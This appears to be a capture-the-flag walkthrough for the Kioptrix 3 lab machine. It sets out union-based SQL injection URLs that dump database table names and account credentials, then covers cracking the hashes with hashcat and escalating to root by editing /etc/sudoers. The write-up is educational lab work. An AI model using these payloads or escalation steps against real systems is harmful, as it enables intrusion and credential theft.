Once you have the Kioptrix 3 ip make sure to update your host file per the setup notes.
After our initial scan we only see two ports open, 22 (Ubuntu) and 80. Since ssh is a fairly secure service we can jump right into the web app.
We’ll start by running Nikto in the background while we put our end-user hat. Clicking links, tabs, viewing source along with any Nikto findings we find the following:
- A possible username of “loneferret”
- Running CMS called Lotus CMS
- A photo gallery app called Gallarific.
- phpmyadmin version 126.96.36.199
- Apache 2.2.8
After quickly trying a few default credentials to get past the login page, we come up empty (ex: admin:admin, lonferret:admin, admimn:password, etc). We can always brute force the webform, but we’ll do some more enumeration.
We can use searchsploit to dig a bit more into the web app. Trying Lotus CMS, phphmyadmin, gallarific, we come up with a good hit - a Gallarific SQLi…
We’ll do this manually to learn a bit more..
We can start by testing the number of columns by using “id=1 order by x–” where x=1,2,3,etc until you notice an error. When you hit that error you’ll know the columns are x-1.
http://kioptrix3.com/gallery/gallery.php?id=1 order by 7--
Here we find the number of columns to be 6, so now we can try this..
http://kioptrix3.com/gallery/gallery.php?id=1 union select 1,2,3,4,5,6--
and we see columns 2 and 3 are vulnerable to a SQL injection.
A quick test shows us the current db and sql version
http://kioptrix3.com/gallery/gallery.php?id=1 union select 1,database(),version(),4,5,6--
We can search the DB tables, find the column names and loot the precious creds.
id=1 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()-- id=1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name=char(100,101,118,95,97,99,99,111,117,110,116,115) id=1 union select 1,group_concat(username,0x3a,password),3,4,5,6 from dev_accounts
Great, now we have some hashed creds in which we’ll use hashcat to crack.
These hashes look like MD5, but use hash-identifier or https://hashcat.net/wiki/doku.php?id=example_hashes to verify.
Hashcat gives a successful output in no time.
We try to ssh with these credenatials and get a low priv shell on both users although dreg has a restricted shell, so we’ll use loneferrets ssh acct.
dreg@Kioptrix3:~$ cd /root -rbash: cd: restricted
Reading the CompanyPolicy.README we geta juicy bit of information about running the “ht” app as root.
To verify this:
This will give us the permissions to edit any files on the system and edittings the /etc/sudoers file will be our target.
Running sudo ht /etc/sudoers > ALT + F > Open > /etc/sudoers > change loneferret ALL=(ALL) ALL
Then once saved…
oneferret@Kioptrix3:~$ sudo su [sudo] password for loneferret: root@Kioptrix3:/home/loneferret# cd /root root@Kioptrix3:~# ls Congrats.txt ht-2.0.18 root@Kioptrix3:~# cat Congrats.txt
Great, we have root.
- SQL injection - Great box to test SQLi manually
- Any creds looted, make sure to try through different open services (mysql creds same as ssh in this case)
- Target other webapps installed vs going after/spending a lot of time on phpmyadmin servers. It can be a common default web app.
- Google and enum the web app for any unknown directories, credentials or version info.